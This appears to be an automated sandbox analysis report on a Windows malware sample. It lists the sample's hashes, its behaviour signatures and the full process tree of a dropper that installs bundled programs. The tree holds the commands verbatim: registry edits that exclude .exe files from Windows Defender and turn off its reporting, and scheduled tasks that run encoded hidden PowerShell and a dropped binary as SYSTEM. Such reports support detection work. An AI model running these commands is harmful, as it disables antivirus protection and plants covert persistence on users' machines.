Analysis
-
max time kernel
526s -
max time network
1273s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
-
submitted
07-09-2022 16:16
General
-
Target
sample
-
Size
1KB
-
MD5
563ffac3b2c4488ecd24e81c655ad397
-
SHA1
28eca35a7ebee2f546b35fff21dfe5e96923a36f
-
SHA256
558fbd26ccbafc05c9a2b070abba157dd69b0d212b821149b056a7b98644cbad
-
SHA512
7e969a85fbf142c82961669e31e70f1029126c879602665ae2cd10a487893e4fa0207ea1d1c6ebe360ebadf0b44f834fcaa69de78a076e7edd97b20f0e550fc5
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 31 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 10 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks for any installed AV software in registry 1 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 58 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 59 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\sample1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe279b4f50,0x7ffe279b4f60,0x7ffe279b4f702⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2300 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4312 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1608 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3584 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2836 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:82⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GT60F.tmp\is-04BPO.tmp"C:\Users\Admin\AppData\Local\Temp\is-GT60F.tmp\is-04BPO.tmp" /SL4 $50084 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 8524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 9444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 2564⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 8724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 9764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 10084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 9964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 10404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 11844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 11964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 11324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 9924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 16044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 16284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15564⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 15644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19804⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exeC:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe /silentmix SUB=c322aa8acb58a24b92f7268bee04d5364⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-29MCC.tmp\is-5Q7I8.tmp"C:\Users\Admin\AppData\Local\Temp\is-29MCC.tmp\is-5Q7I8.tmp" /SL4 $50232 "C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe" 804864 52736 /silentmix SUB=c322aa8acb58a24b92f7268bee04d5365⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe"C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe" /silentmix SUB=c322aa8acb58a24b92f7268bee04d5366⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "fdm-11.exe" /f & erase "C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "fdm-11.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 20324⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exeC:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BLAUO.tmp\is-A0L88.tmp"C:\Users\Admin\AppData\Local\Temp\is-BLAUO.tmp\is-A0L88.tmp" /SL4 $702DA "C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe" 941720 527365⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe"C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nq6YpvzU\tmWQ1yAGoEVPHDWNpKH2.exeC:\Users\Admin\AppData\Local\Temp\nq6YpvzU\tmWQ1yAGoEVPHDWNpKH2.exe /S /site_id=7576744⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4A7C.tmp\Install.exe.\Install.exe /S /site_id=7576745⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS5E91.tmp\Install.exe.\Install.exe /S /site_id "757674" /S /site_id=7576746⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
- Loads dropped DLL
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHlDNxXeG" /SC once /ST 08:21:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHlDNxXeG"7⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHlDNxXeG"7⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQVIyCuucUjqxTYLAY" /SC once /ST 16:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe\" 3T /site_id 757674 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 20284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 7924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 20244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18124⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\w1free.rar_id20808554.exe"C:\Users\Admin\Documents\w1free.rar_id20808554.exe"1⤵
- Executes dropped EXE
